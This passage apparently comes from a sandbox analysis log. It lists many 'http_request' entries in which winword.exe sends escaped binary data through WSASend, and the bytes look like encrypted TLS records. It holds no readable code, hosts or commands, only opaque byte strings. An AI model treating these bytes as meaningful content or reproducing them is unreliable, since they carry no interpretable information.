\\xa44\\x81\\/\\xa6>'v\\x1a\\xbex\\xd0\\x0c\\xfd_\\x8b\\xa0|\\xe9\\xcb<w\t\\x9c\\xeb$\\x9e\\x19g\\xc2\\x1c\\xe4\\xca\\x12\\xa1\\x13\\x00\\xfee\\x92f\\xcb=\\x16\\x8foue\\xcfwb\\xd9\\xcd\\xb1/\\xd1\\xd4\\x0b)\\xaep\\x98\\xbc\\xf0\\xc2$\\xf9\"\\xcf\\xa9\\xcb\\xd2\\xd5\\xd3k\\x1e\\xec<\\\\xb4\\xb6\\x98\\xcc\\xccq\\x84\\xab\\xf2\\x9bq/\\xd7x\\xb5\\\\x10\\xa9xo\\xa7\\x84\\x04\\xe1\\x04\\xc1\\xc4\\xd7\\xd5\\xb8\\xed\\x8c\\xb3f\\xb3v\\x0e\\xeap\\x1c%\\x12x-!j\\x1c\\xaf\\xf12\\x12s\\x89\\xd7\\x0c(\\xb0"
  473.  
  474.  
  475. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc8\\xbf\\x1a\\xdb\\x96ypr6\\xefh\\xb1\\x85\\xfao\\x98d\\xa1`p\\xe8\\xdc'\\xc0\\x00\\xe6\\xad6a\\x95\\xeb,\\xef\\x88\\x90\\xffp\\x96\\xa8\\xd2d\\x07\\xd3\\xa7.\\xc5\\x1e2\\xba\\xaf1\\!5\\xcc\\x12\\xe0\\x11\\xf1\\x88zwu\\x0f\\x83\\xe6\\xddwo=\\xdcb\\xfc\\xa0\\xacc\n\\xb2\\xbf~\\xeb\\xca\\x84\\x8a\\xeb\\x105\\xee_\\x86\\xdeb\"j\\xd7\\xbb\\x8c\rq\\xf3\\x02j\\xcb\\xc2\\x81\\xb2x\\xfe\\x8d;\\xde\\xbd\\xec\\xae\\x97\\x92zql\\x84\\x8f\\xc7\\xa8\\x13\\x93'\\x8b\\xc66c\\xad\\xfd\\xd1y\\xc8\\xc9m\\xc6k\\x05s\\x06\\x1e\\x02a\\xc7ay\\x0c\\x89\\xe5\\x04\\x8e\\xe2\\xda\\x93\\\\xa8\\xc1\\xfff\\x18\\x8f\\x1d\\x9d\\x07\\x14\\xd3~\\xbe\\xbek\\xe6i\\xdc \\xa2h!*`f:\\x11?\\xed48/\\xe7\r\\xb5\\x9f\\xcbo\\x03t\\x8c\\xa36\\x1aa\\xab\\xe3\\x84\\xe6\\xc3%e\\x14\\x89d\\x80\\x10 \\x19f\\xc4\\x9cud\\xb5\t+\\x1f\\x8cq\\x18vyk\\x92\\xf1\\xdc\\x1ai\\xdea\\x88\\x05\\xaaj\\xf6zm\\x85"
  476.  
  477.  
  478. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb9~\\xe8\\x19\\xf9\"\\xd7c\\x9a\\x83\\x8dj\\x84ed\\x12d\\xb5\\xc4e\\xae\\xf4\\x91\\x9e4m\n\\xf0\\xa4\\xa7\\x15e\\xb3\\xcan\\xdd\\x93\\xff,\\xfe\\xde@\\x9b)\\xc3\\x06\\xbe\\xf9\\xa3\\x983r\\xe5\\x1c\\x19a\\xc3\\x91\\xa2\\xb6#\\x9f^kl\\xb9\\xd7\\x93z\\x16\\xd0\\x1d!d\\xa0\\xecx\\xb8\\xbfal\\xa0:\\x19\\x1dt\\xde\\xe7\\x8bi\\x89\\xe9.n\\x8fa\t\\xcfv4\\x14\\x9c\\xdfb\\xb0\\x97ar\\x8d\\xdf\rh,\\xcd\\xb0\\x978jf!|\\xa5b\\xf3\\xff-\\xcfy\\xb6\\xf7\\xf5\\x80\\x8f\\xbb\\xf8'\\x88\\xb5\\xb2\\x9ct\\x93\\xd7\\xed\\x13\\x18\\xb3c\\xf9\\x83\\xd9==\\xb7l\\x9f\\xd1t(\\xff\\xf8.1\\xa8ao\\x92\\xd7\\xaf~\\xda\\x87h\\x19j\\x12\\x92\\xf5\\xc110<ft\\xb0\\xaepg\\x80\\xc7ik\\xbb9b+\\x81n\\xb7\\x99\\x15\\xefmt\\x85\\xe5\\xdf\\x01\\x04\\xbf$\\x9c\\xa1\\xd8\\x05\\x02wh<\\xd7x\\xe9\\x0b\\x0fs\\xbb\\x0b\\xcaf\"fo\\x10\\x96\\x8d\\xbb\\x17\\xd5\\x89\\x9a\\x87\\xeb\\xfe\\x1b\\xe7"
  479.  
  480.  
  481. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xdd\\xfdl\\xd6\\x7f\\xa0\\xd2\\xd1q\\xd6\\x97\\xb9,\\xdd0\\xfe\\x00\\xdd\\x81\\xdau\\xd6\\x0b(o\\x9c\\x1ezk\\xf9\\xa5dn\\xdd\\xc4\\xa2\\xee?\\xa0\\x1bus\\x89\\xa2\\xee@t\\x1ej\\x91:\\xb4\\x9c\\xf0\\xaa\\x0e\\x11\\xac\\xb5\\xc93\r\\x01&\\xffk\\xbdg\\x02\\x8a6\\x82\\x13|$\\xea=z\\x99-\\x03\\x8et\\xc1\\x89\\xd5\\x82\\xb5\\xfe-&cm\\xbe\\xd8\\x02\\x8d1~\\xb9\n\\x87\\xec\\x97\\x9d=\\xc9\\xbd\r\\x85m\\x01m\\xd6o)\\xa2\\x1c/x\\x82\\xb23\\xe0xf\\xdbb\\x17q\\xee\\xab\\x8c\\xdb.\\x0e\\xab\\xaa-\\xadn\\xa6\\xaf\\xde\\x10$\\x83b\\x1fu\\x85@\\x85\\xdb\\xa3#\\xb7\\x9e\\x12r9j\\xf3\\xe61^\\xc4d\\xc0p\\x15\\x8e\\x13\\xc1\\xff*\\x85\\xd1\\x9ejk\\xcb.\\xb1\\x92\\xe5\\x02\\xa4gq^!\\x12m\nz\\xa4\\xf4\\xd4\\xa8\"\\xb8\\xc7\\x84t\\x088\\x0cfm\\x82\\x9b(:h\\xb1tkm\\x94\\xccc\\x12(\\x1c\\x99\\xb3;\\xa1\\xcb\\x88\\x93s?v\\xd5\\x1c\\xaez\\xa5l\\xce\\x0b\t:!/"
  482.  
  483.  
  484. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010ki\\x15\\x10\\xae\\xe6\\xdd\\xbc\\xc1l\\xbd\\xb1\\x99\\x9dqb;\\x9b96b\\xb0\\xcb\\xeci\\x81+'\\x81\\xef\t#\\xfcc\\\\xcc^~~\\xd7\\xbb\\xf8wg\\x7f\\xae\\xab\\xb8\\xc2\\x9c\\xa5~\\xac\\xb6\\xef\t\\x83e(g2ov(\\xe3v\\xcb\\xf6\\xee3\\xbe\\x0b357\\xfdqy\\xe3(t2d\\x01\\xfdu\\xb3\\x14a\\x97\\xf4\\x15\\x97\\xb0\\xe8#\\xe1\\x04 xq\\x8b\\xcb\\xa7\\xfc\\x07\\xdb%!\\xdce\\x1b\\x0e4\\xbdj \\xeap\\xec\\xcc+u\\xa1m\\x97\\xea3\\xc3\\xdf\\xf0\\x15\\x19k\\x8a\\xc9p\\xab\\x1c\\xae/w\\x9bk\\x18\\x9a\\xbd\\x90m\\x95\\xbc\\x8ay\\xfbbp!r\\x08\\xf1\\xff\\xf5\\xa2\\x81p\\xf6\\xe0\\x10\\x92\\x98\\x85\\x7f\\xbf\\xf2\\xabi\\xd2\\xe3pp\\xc6\\x1eg\\x9bi\\x07a\\xdc\\xe3\\x0c\\xf0x~\\xe0\\xcc<\t\\x16\\xc1\\xf4b\\xde\\x8d\\x16\\xa7\\xb1\\x0e\\x0b\\x16\\xc93r\\xb5\\x03\\x94\\xf3cte\\x9f\\xc3z\\xee\\xb5\\x89zi\\x89\\xb3\r\\xff\\xecn\\x87a\\x19\\x1ax\\xc42#\\x92%*\\x0e\\xca\\xabx"
  485.  
  486.  
  487. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010fcv\\xad\\xe0n\\xa1\\xc0\\xdb\\x18\\xcc\\xe1\\xb1,|\\y\\xb6\\xbe\\x1f\\xcf\\xb5\\xcdm\\x87\\xebo\\xd5\\xd6\\xa9?\\x8clh\\xef\\xab\\xa9\\xb4\\xa3wz\\x0c\\xe57\\xe1\\x1a\\x7f\\xfc\\xc8*\\x02\\x88m\\xe5\\xe2\\x15\\xdd\\xc5\\xbdv\\x8cq \\x93\\xe9\\x06\\xb1\\x87\\xd6%\\x8dg\\xe9\\x1af\\xe3o\\xc7\\xc5\\xc2\\x13\\xcax5c\\xbc\\xd1\\xfb\\x1dv\\xefma\\xbequ\\x0e\\xae\\xa8\\x80jm.:\\xc7\\xf5o\\xc4\\x1d\\x02\\x91\\xba\\x82ibavj\\xf4j\\x08\\x1f\\xc3\\xca\\xc4\\x81\\xb2\\/\\xec\\xf6\\x15i<\\xdbdd\\xeb\\xa3\\x14\\x89\\xb0c\\x84$\n\r\\xf1x9#\\xe6\\xcf(k\\xa8j_\\xadpzn\\xec\\xb5\\x83rw\\xa0z\\xd8e\\xd1\\xa2yk\\xf2\"\\x89)\\xfc\\x02\\xb1\\x92\\x92fc;ok0e\\xd7>\\x8e\\x1fm\\xcf\\xf0\\xd1\\x87\\xd5\\xa0\\x1e\\x88m\\xd7,g\\xd5\\xed\\xb7h\\x91\\xa2\\xd8`\\x1da\\xe0\\x12v\\x8e\\x8a\\xeea\\x94\\xa3\\x9d\\xe8\\xf8\\xbe\\xc9\\xf3\\xd9\\x19\\xcd\\x84\\x93\\xf8\\xc5\\xe8\\x15h\\xf5i\\xf6\\xaf\\xf1\\x06"
  488.  
  489.  
  490. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xed\\x8e\\xe7\\xa75\\xcd\\xae\\xd3q\\xc8iu\\xd7\\xcc\\xdb\\xbf\\xe3\\x03\\xbb\\x8e2eh\\xa4j\\x983\\\\xdb$\\xb9\\xe2^\\xcd\\x8b\\xcc\\x86\\x05\\xf7#\\xaco?\t1m\\xe1c0\\xbe\\x85l\\xd7\\xda(\\xdc\\x9a\\xc4\\x98\\xc7\\xeb#\\xd7\\xdb\\x82\nw\\x19\\xdf\n\\xb7\\x8f\\xa9\\xa5n5!mx8n\\x1b\\xd2\\x19\\x9b\\xc2\\x12\\x86c\\xb4\\x11\\xe1\\x83\\xa6c\\xb8\\xf7!p\\x08\\xa0\\x13\\xd0\\xa0\\xb0\\xe7\\x0b\\xc6d_\\xa3\\xc8#uhx\\xdd\\xc5?y\\xf8mz\\xb3\\x143%\\xc7!\\xe3\\xf4\\x03\\xcf\\xb5\\xc4;\\xcag\\xe3\\x08\\x8aa\\xa3\\x14\\xdco-\\xff\\x9c\\x96+\\x97\\x1ffj \\xd8g?y\\xf3-\\xfa\\x98\\x01\\xb4)\\xbb\\xd2\\xf1d\\xc1\\x95\\x88*e\\x80c\\xcc\\xd4\\xe2f\\x7f(\\xf1y\\xc3\r\\xc2%\\x06\\xcf\\xf9\\x83\\x10<\\xa3\\xce\\xf3\\x1d-\\xc9\\x7f6\\xf3\\xe3\\xa9%\\x13\\xa2\\x16k\\x0b\\x9f\\x96\\xcbm8\\x0f\\xb3\\xd1f\\x02y\\xdc.\\xad\\xa0\\xba9\ryi@s\\x19\\x01~-+\\xf8hf\\x8e\\x044\\xc7_"
  491.  
  492.  
  493. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xbc\\xf1.\\x18\\x81*\\x07\\xa6\\x10\\x8f+\\x88\\xdb\\x96\\xc0\\xdf\\x04\\x1f\\xf7\\xec\\xb4\\x93:\\x13\\xf6\\x845y\\xa5\\x14\\xc2\\xe1a\\x17\\xa8v\\xf79q\\x96q\\xe0\\x11*\\xca>\\xa7\\xcd\\xe8kfp\\x84\\xf9\\xfb\\x13c\\x19!\\x91\\xd9'r2\\xc9hs\\xca\\xbab\\\\x11n\\x01\\xe0\\xc1\\xa2\\xd6\\xf0\\x9bc#\\xf3\\x02\\x88\\x81\\xa69\\x95\\x13o\\x91x\\x86\\xde\\xbf\\xf3\\xa5\\xddf\\xc0\\x17\\x16\\xd8\\xb7\\xf6\\x04\\xd2\\x1b\\x89=r\\xb8\\x1ak\\x83\\x99s\\xbb\\xd6e_\\x92\\x83v\\x1fi\\x9a\\x93\\xc0l\\xb8+p\\x14f\\x06\\x88l2\\xb1n1\\xb6/\\x85\\xbdn\\x1cx\\xbf\\x87\\xd6rzw\\xa6e\\xfbenpu\\x1e\\x1e\\x7f:\\xd5\\xa5\\xcf<\\x82n\\xb0-\\xe0k\\x01\\x02d\\x11\\x1e\\xfc\\xf2\\x81\\xec\\xdb6x\\xba,<\\x91\\x92i\\xb3@\\xbaw\\x06\\x9d\\xdd+\\x8c\\x91\\x9d,g\\xe9phl\\54\\x04\\x19\\x8b\\xbe\\xb0:\\xd6\\xa8\\x7f\\xaa\\x8cc\\xf0\\x84\\xa9)\\x02jp\\xbb\\x8e\\x04`\\xd9 \\xbc\\x18\to\\xda\\x0f\\xc6\\xf6\\xbb\\xa0"
  494.  
  495.  
  496. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xd9\\xae\\x04\\xc2de\\xee\\xbf0)\\x9d*@h\\xf4\\x02\\xf4\\xc0s\\x86\\xf2\\xc5\\xd0\\x0f/ku\\xc7\\x1f\\xf6\r\\xbfv\\xe4\\x94\\xa5\\x94=\\x06\\x04e\\xacs~\\xf4\\x1bq\\x04f\\x1dt\\xae\\x14\\xbd\\xe4\\x7f\\x7fy+\\xe1\\xea\\x07~|h^\\xdd\\x1e1*v\\x92|\\x9fr\\xdaq7\\xe2v\\xb9t\\xf7\\x96\\x12dj\\xc5\\x1d\t;s\\x96\\xf0\\xb0&\\x18\\x1a\\xeb\n\\x9f_,s\\x1f\\xf2w\\xd0\\x99v$\\xca\\xa9\tir\\x15\\xef\\xa9kgb\\xb9\\xc94\\xced\\x1bkc\\xf9kd\\xae \\xa1\\xb9\\xcd \\xf9\\xc5x\\xe2s+hs\\xd3\\xc0\\xea\\xbf\\xf5y\\x05\\x99\\x1d\r\\xdc\\xdf~\\x1b~i-\\x7f\\x06.\\xcb\\xb0\\xf5\\x82b2\\xad\\xde\\xc7nu\\x1c\\x1f\\xec\\xca\\xf7\\x05\\x88\\xb7\\x07k\\xc1\\x88\\xd6n9\\x1b\\xe9\\x86c+=\\xbf\\x19s8\\xc8\\x90\\xab\\xec\\xdf\\xcap\\xa9\\x7f\\x99\\xdb:\\x96\\x031\\x19\\xedda\\xe2 \\xbe\r\\xf6\t\\xaclg\\xcd\\xdfd\\xa2m\\x1c\\xaf\\x91\\xbb\\x11ep\\x10\\x1f\\x0f\\x170f"
  497.  
  498.  
  499. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x88\\xd5e\\x0e\\x0f\\x1bv\\xae\\xa9\\xf0\\x00\\x84e\\xac\\x93\\xa31\\xbd\\x8a8o\\xab`t\\xe0\\xef\\x92f\\xe5i\\xf7\\xf5r,i:~\tf\\xed\\xaf\\xb3es_\\x82\\x1a\\x12\\xa8\\x07\\xa3fv<\\x13\\xa4\\xae\\xea\n\\x08z\\x11%\\xc0'\\x16\\xe2\\xea\th\\xc8\\xe2\\x89\\x0f\\xda\\xdb\\xff?\\x0e\\xdf\\xd4d\\x07\\x97r\\x0c\\x11\\x99\\xf6\\xb6\\x0f\\xa1\\x88\\x02\\x03o\\xaa`\\xcf\\x1c\\xc1;j\\x97\\x02d\\xc5\\x187\\x10m)<\\x98\\xd5x\\-x\\xeb\\x9d\\xae\\xfc\\x93\\xb5\\x00*\\xa3\\xa1\\xf4\\xe3\\x84\\x96\\xb9\\xfdev\\x89_\\x18\\x8a\\xaa\\x92\\x82\\xa2k\\x7f\\xfff\\xc1\\xea\\x85p\\x9b\\x1a\\xd7/\\xef|ci o\\xf1ec\\x10u_\\xfes\\xb2\n\\xddg\\xb6\\x99$\\xe4\\xa3a\\xb0~\\x97-\\x1ac\\xfe\\xa4\\xe4w\\xa4\\x1c\\xd0\\xf8z\\xe0%\\x0c\\x8d\\xba\\x8b\\x02\\x95\\xc5\\xa7u\\x19\\x19/\\xd5f\\xec-\\xd3wyz\\xfb`0\\xb1\\x99\\x82\\xe2\\x94;\\x95\\xb6\\xeb\\xf9\\x97a\\xdfb\\xe1^\\xd2_\\x13go\\x87\\xa5\\xe1:"
  500.  
  501.  
  502. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xd2\\x00b2\\xd9\\xda\\x0b\\xcdd\\x1c\\x1a\\xfd\\x9e3\\x14\\xd9l\\xff\\xa9d\\xe1\\xeb!\\xc1\\x9d\\xc1b\\xd8\\x18\\xf7n\\x7f\\x06_#\\xcf\\xb1\\xc0\tv\\xa6\\x80\\x009\\xc8\\x04\\x0f,iup\\x1b\\x19!\\x04\\xf8\\xa1\\x8f=h\\xb3^\\xbb\\x91\\x15\\xdb\\xeal\\x86\\x8d~\\xf6&\\x19\\x97\\xdcr \\xae\\xd34e-\rv\\xf0q\\x84\\xed\\xfc\\\\xc4\\xb8j\\x83>\\xcf\\x19y\\x8e\\x18h\\xc5\\xee\\x00\\x10.\\x9a\\xac\\xd8z2\\x9a\\x863z\\xec\t\\x00\\xfb\\xd2\\xd5\\xf9\\xcd\\xe2\\xe7\\xf0\\xeei`g\\x00`\\x17s_b\\x89\\x14\\xabmo\\x8f\\xf5\\x84\\xce\\xf4\\x18xu\\xdd\\xe2d\\x9f\\xc0=\\x96\\x0e\\xc2\\xcb\\xec\\x02h>\\x10\\xa6\\xbeey\\xa4v\\xad\\xe0h9\\x92n\\xdd0\\xae\\x1ep\\x85@\\x92\\x82$\\x8aj\\x94\\xc3;\\xdbd\\xa4<\\xde\\xfb\\xd3!\\x1d\\xad\\x07$\\x1ef\\xfa\\xa8\\xf8i^:\\xdf\\xd8z\\xfb;\\x19i\\x9dto\\xa1\\x1b1\\xa7-\\x0c;\\xdfs\\x9a\\xa3\\x98kca\\xfe^\\x18n\\x1b\\xb6pw*\\xccc"
  503.  
  504.  
  505. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xeb\\x95\\xe2\\x0ev\\xab\\xf5if\\xb2\\xcetj~\\x07\\x88\\xbd\\x18\\xd8;a`\\x13'o\\x1ea\\x1f\\xbc\\xe0\\xb6\\xf5\\xdel\\xe3\\xcf\\xe2\\xd4fu\\xab\\x8am\\xf7\\xbb\\xb82m\\xfb\\x86\\xff\\xda\\xb4\\xb0\\xd4)\\xee\\x17g\\xfd\\xd6c@u\\xfc\\x193n\r\\x87\\xadz\\x17\\xf7\\xa8l\\xc5\\xbd\\xc8\\x83\\x87x\\x19\\x85+-\\xd5sq(\\xc4\\x107hgm6\\x14\\xfa4b\\xc5v\\xf9\\x03\\x1b\\xa5\\x1d\\xfc\\xd6\\xaa\\xa11\\xa4yb%\\xc0i\\xe4\\xc8\\xdcp,\\x06\\xe1\\xa2\\xb9#\\xbb.\\xb0\r\\xbb\\xb8\\xda\\xb9\\x8bd\\x8c6ij\\x13\\xaa\\x91\\x96\\xa6\\x9d\\xf1\\xa7\\xcf\\xe2\\x0c\\xb7x\\xf0\\xb0\\x92\\x7f\\xd8\\xfc\\x9f3\\x0e~|\\xd3\\xdb:@j\\xbe_0 \\xf8\\xef\\xe6\\x9c\r\\x06r\"\\xddrb\\x82\\xfd\\xb8\\xb0\\x84n xt\\x07 5\\xc5\\xbb\\x0f\\xcd\\x95\\x01\\x1a\\x00\\xd2'\\xa7\\xb9\\xf8\\xb8h\\xa9q:<2\\xde\\x1e&qp\\xab\\xb5>n\\\\xed\\xa7\\xb6\\xfa\\x86\\xfe.q\\x19\\x0b\\x8f\\x1eg\\xa5\\x14\\xad\\x81\\x9e"
  506.  
  507.  
  508. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010=\t\\xb7d\\xad\\x11\\xb2\\x8f\\x08\\xa9\\xc9\\xcbi\\xc2\\xf5\\xd3\\x07\\x92d\\xcfm\\xd8u-*;\\xbc\\xfc)z\\x90\\xb4g\\xee\\x83\\x8d\\x1e\\x96#k\\x01hz\\xc7n5\\xc5,d=-f:\\x84\\x94\\x8a2\\xca\\x9f\\x9d\\xf96g\\xe9e\\xb9n \\xff\\xb0\\xf1wvq\\x8a\\x88\\x16\\xfb\\xdc\\xb0\\x1f\\xf6\\xe2\\xa4\\xe0\\d\\xa3.\\xe6g\\xe4\\xfc\\x9cj\\xcd\\x88*\\xa8\\xd0y\\x8b\\xdcx\\xae\\x90 \\xf4\\xe5\\xc1\\xe8\\xe6\\xcf\\xf1lcox\\xeb\\x05 k\\xfc\\xd8pkf\\xc4\\xbc\\x173\\xb6\\xb3%\\xa3p\\x00x\\xd1\\x05\\x04s\\xee7\\xbb3\\x9d\\x1d\\xb9\\x8d\\xf8p~&\\xea(\\xc8_\\xae\\xc6\\xb1\\xbc4c\\x9dzh>\\xd6\\xabd\\xa9\\xa9\\xcd\\xc5\\xe8i\\xa5j\\xe8\\x92\\x02\n%.\\xc4\\x922j;\\xc1\\x12\t$)ya\\xb8\\xd3dr#\\xe0)\\x9bo>$\\xc4\\xfc:\\xf6\\xcdi\\xd5\\xe7\\x11\\xb9\\xe1f\\x94\\xc9\\x07\\x8b\\x8a\\xac$~\\xb0b\\xcb\\x9e\\x0bo9\\x07\\xbdy\\x1f\\xb9\\x80;\\xcd\\x04\\xa2\\xe5\\xe1\\xf8"
  509.  
  510.  
  511. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xa0\\xea\\xd7,;\\x14\\xf0;?\\xd4\\xc5\\xae\\xa7\\xfb\\xa2\\xad\\xb3\\xbd\\x12r\\xc4\\xec\\xdb\\x98?1\\xae\\xb0\\x17j\\xa6@\\xff\\xb5\\xcd1\\x96\\x87\\x8e\\xae=\\x8a\\xde\\xf6\\xe0\\xc2\\xa6\\xf3\\xea\\xe4\\x04n\\xa4\\x8e\\xf3\\x03lgl\\x80\\xc6\\xdcy^\\x93\\xa7%h\\xd3\\xad\\xa3\\x80s\\xafie5\\x12t\\x81l\\x053\\x03f\\xac\\x8a\\xdd,\\x96\\x06\\x00\r\\xa3\\xcc\\x04\\xca\\xc9f \\x9e;o\\x98#?\\x07e\\xb50\\xf3\\xfcdi\\x02\\x9d\\xf2r~\\x9bi\\xeb\\xe6rm\\x89\\xffq4insu\\xf68\"'8\\xdej\r\\xbc\\xf8\\xce\\xfa\\x81\\xd8\\xce\\x0f\\xa6\\xa8\\x96@\\xe7qsst\\xa7\\x1c\\\\x0e5\\xae\\xf5ea\\x8c\\xd5pci&\\x8a>i\\xfc\\x9b\\x94ip\\xcdm\\x18\\x98e8\\xedi\\xcc\\x16\\x08c\\x90\\x9a\\x81\\xa4\\xed\\x1a\\x1c\\x9c\\xf0b\\x94\\x17\\x02\\xe8\\xf4\\xd0\\xa1\\xf4\\x94|\\xe3\\x8f`\\xac\\xa6\\x98\\xc2\\xf6\\xf5-7.\\xcd\\xb7\\xf9 \\xfe5_-33\\x1a\\x945\\xb2\\xf5\\x84zp\\x05\\x18\\x10yu"
  512.  
  513.  
  514. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xd3h|d\\x8d\\xf9\\x00i\\xb6:xe.\\xb3\\xa6`\\x80\\x1b\\xc6\\x981_\\xca\\x17\\x8d\\xf1\\x9f\\x9e\\x951\n\\xbdp\\x97\\xf5\\xc0\\xbc\\xd6\\x19z+\\xa3\t\\x10\\xa8<\\xee\\xa6\\xef\\xd0\\x0ck\\xb0k\\x04\\xbd\\x0e\\x1f\\x98vey\\xb7\\xcb\\x1bv\\xdd\"\\xeb\\xa9\\x99\\x13\\xd5\\x8a15a$b\\xba\\xff?\\xf7j\\x0e\\xc9\\xcb\\x02\\xaet44w\\x06\\x8bf\\x1e\\xea\\x8c\\xbdim\\x08\\xdei\\xa4r\\xe1\\xfa\\x97~\\xb5\\x11\\xef$\\xee\\xfb\\xf6\n\\xa3\n\\xbb\\x87a\\xa6\\xb8\\x93\\xc5\\x8e\\xae\\xc8\\x01\\xa1\\x18l_\\xf1\\xd9\\x0e\\x82-l\\xac\\xee\\xe8\\x17#=\\xa7\\xcb\\xad\\xba#\\xc3i\\xa3\\xe8\\xc0\\x05\\xaf\\xab&\\xcd\\xdb\\x95\\xac\\x86g\\x8c\\x10\\xb4\\x853\\xb4\\xe0;\\xa8\\xe4\"\\x97i\\xfa\\x0c\\x84\\xbc\\xeb0\\xfe\\x0f\\xa7\\xbf\\xd3\\xdd\\xd8\\xfb\\x94\\x1b\\x83\\xfee\\x80\\x12k\\x9b\\xa1\\xa7x\\x9b\\xd2\\x0f\"\\x91\\xc15\\xf3\\x9b$w)\\xd7\\xb6\\xcd\\xcd\\x18\\x0c<\\x0b\\xa1\\xb6\\xeb\\x0b\\x93\\x84u\\xab\\xc04\\x9a\\x03\\xcf\\xd7\\x14\\xe0.\\xb6^\\x06+\\xdf"
  515.  
  516.  
  517. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010w\\xc1lro\\xa8s\\xe6a\\x0ft\\xf3\\x963\\xc9^\\x0b\\xb7(7\\x94f6\\x8f\\x9e\\x97\\xc8\\xa8\\xb7\\x95n6\\xbax\\xdb\\x9e\\xe7\\xech<t\\x07i\\xd1\\xa5\\xa2\\x92\\x03\\xf7\\xd0l\\xaa\\x858\\xfc\\xf2\\x81\\xdfr\\xc9\\xcc\\x08\\x9cp/\\x87\\xe5\\xe2ve7w\\x14h\\xe9\\x11c.\\xea!\\xe7\\x83kw|,\\xb0%\\x0fn\\xb5\\x9f(\\x03\\xb6\\xf7\\x8c\\x1e\\x8d\\x1c\t\\x83j\\xfay\\xfb\\xa8\\x04akc\\xc9\\xab\\x8d\\xe4\\xb5\\x08d\n\\xd1ab\\x8b\\xb683\\xf1\\xbd\\x15d\\xbd\\xa1>\\x19g\\x98\\x7f%\\x84\\x01\\x9c\\xbc<\\xef\\xb1s\\xad,\\x98b\\xc0\\xd5\\x12\\x91\\xa5$\\x99\\x19l\\xee\\x9d\\x1a\\x18\\x0b\\xe4\\xde\\x1d\r\\x1a\\xa5\\x8cr\\xcd\\xee\\xf8\\xd7\\xc8\\x96\\xba\\x1a\\x1f\\xbax\\xbfo\\xb10;\\x17'\\x8d\\xa8\\x11t\\xab\\xef5\\xe80\\x17\\xce\\x85\\xba\\x0c+\\x1d/\\xb9ms\\x82*>\\xa3\\x14\\x14\"v\\xf3#|6y\\xf7\\xb4e\\xe9\\x13\\x0b\\xfd\\xc9\\x00\\x06\\xb0/\\xb7\\xf9\\x16\\x87\\x96=\\xb2\\xcd\\xb5\\x03\\x04\\x9f\\xa5\\x1e"
  518.  
  519.  
  520. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc9\\xb8b\\xa7\\xd1\\xaa\\xf7\\xd9\\~\\xd9\\x91\\x82.\\x00u\\x04.\\>\\xa8\\xc1)?\\xee\\x06\\xd9\\xd0\\xdeh\\xd2\\x067%bb\\x10.\\x18\\xf1p\\x7f\\x9cwc\\xfb\\x8d\\xce\\xf4g\\x19\\xe6~\\xfd\n\\xa4\\xb4`\\xfate\\x0e7\\x82\\xd7\\x9a\\xed\\xbc\\xcd\\x88+\\x11\\xd8\\xab\\xbb\\xec<7\\xa6\\x0b+g\\xff\\x11\\x01\\xde\\x1b\\xb6\\x99\\x9b\\xf4\\xaa\\x18rc,q\\x9a\\xa9dq\n\\x87\\xf3\\x0b\\xed\\xe0\\xf8m<\\xb8\\xe2\\xdf\\xad\\xc4\\xd0\\xcfi\\xa8\\xaf\\xa3(\\xc6\\x87\\x1d\\xe9\\x9b\\xdd\\xba\\xc8\\xb6<\\x92\\xeb\\x89\\x81\\x186\\xbb%t`\\x06\\xd5\\xbe9%\\xfb\\xa6\\xa2\\xf6r4\\xdde\\x95\\xaddl\\xf5\\xe1;xg\\xdd\\xf4\\xae\\x07\\xb7\n\\x9d(\\xfext\\xda\\x02m\\xdd/\\xfb\\x00b\\xd3\\xado\\x158\\xf4\\x13\\x11v\\x95\\x9di\\xc2+\\x10\\xab\\xff\\xcd\\xda\\x9dm\\x9a\\xb7\\xf6\\x98\\xbf\\x90o\\xc5\\xb2\nt\\xc3\\x04\\x11\\x7f!\\x9b\\x18pg\\xd6\\xbc\\x83\\xff\\xf7\\xaa\\x17\\xfdh\\xc8xn&\\x0b\\x93\\xf9/\\x83l\\xcc\\xf3"
  521.  
  522.  
  523. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010kj\\x93l'_\\xa6\\x02)\\xee\\xa3%\\x14\\xea\\xbf\\xe6v\\x87d\re\\xb2\\xbah\\x8fv<\\xf0\\xeb\\xa1\n\\x84\\xf3\\xfc\\x1cb\\xb6\\x97\\x98\\xca\\xfb\\x9c\\x9cg\\xc9b\\xd6gk)xskfq \\xabx\\x91$$\\xf3\\xad\\xf4\\x91\\xd6`\\xdf\\x96\\xc9\\xd2\\xb004\\x7fl\\xda\\xb5\\x94\\xcd\\xb4@f\\xeb\\x0c\\xc4\\x88@-\\x06\\x16s\\xc8\\x13\\xa5\\x00\\xfe\\xe0\\x02\\xf1\\xc3\\x83yi\\xd4\\x9a\\xf1\\xca\\xb1\\x8b\\xa9\\x13\\x93\\x94\\xa5@\\x83\\x05\\x80\\x98?\\x04\\xda\\xe9\\xdav\\xb9t\\xc1\\x80h\\xdf\\xe6\\x00\\xea\\x89.\\xd1\\x14\\x98-%\\xf2\\xf5h\\xb51)\\x83\\xab\\xfa\\xeb\\xaf\\x1f*xj\\xf7\\x1e\\xb1\\x8d\\x11\\x9d-\\xca!\\xb8\\\\xbe\\x1dc\\xd9\\x8c\\xec4\\xd3t\\x1c\\x9eu\\xbe&b\\x9f\\x97\\xa2\\xf3\\x14\\xd0\\x98s%p\\xb1\\xaa\\xdf\\xc0l\\x80\\xf5\\xf4?\\xb2w-\\x06\\xcc*\\xfe\\xd4\\x8cq\\xc7\\x96\\x0f\\x89a\\x06\\xa3\\xa3\\x88\\xae\\xd1\\